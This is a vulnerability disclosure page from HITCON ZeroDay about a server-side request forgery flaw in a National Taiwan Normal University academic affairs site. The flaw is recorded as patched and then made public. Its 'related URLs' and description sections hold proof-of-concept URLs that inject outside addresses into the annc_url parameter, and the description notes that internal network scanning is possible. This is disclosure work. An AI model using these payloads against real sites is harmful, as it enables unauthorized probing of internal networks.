Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-01386
- 發信 Vendor: 國立臺灣師範大學
- Title: 國立臺灣師範大學 教務處 SSRF
- Introduction: SSRF
處理狀態
目前狀態
公開
Last Update : 2024/11/16
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2024/10/26 21:08:46 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/10/26 22:13:19 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/10/29 21:42:48 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/10/30 07:46:46 : 新提交 (由 {{萌新}} 更新此狀態)
- 2024/10/31 12:57:26 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/08 18:23:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/08 18:23:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/11/11 14:27:56 : 修補中 (由 組織帳號 更新此狀態)
- 2024/11/12 09:20:12 : 複測申請中 (由 組織帳號 更新此狀態)
- 2024/11/12 10:10:00 : 確認已修補 (由 {{萌新}} 更新此狀態)
- 2024/11/16 03:00:09 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-01386
- 通報者:nhd1261 ({{萌新}})
- 風險:高
- 類型:Server-Side Request Forgery (SSRF)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.aa.ntnu.edu.tw/annc_url?url=https://[email protected]
https://www.aa.ntnu.edu.tw/annc_url?url=http://[email protected]
https://www.aa.ntnu.edu.tw/annc_url?url=http://[email protected]
敘述
發現師大教務處有與ZD-2024-01385相同的一個功能。
https://www.aa.ntnu.edu.tw/annc_url?url=http://www.aa.ntnu.edu.tw/files/archive/854_c4e083be.doc
以相同的方法嘗試,成功將頁面導向google,也能嘗試內網掃描。
https://www.aa.ntnu.edu.tw/annc_url?url=https://[email protected]
https://www.aa.ntnu.edu.tw/annc_url?url=http://[email protected]/get
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。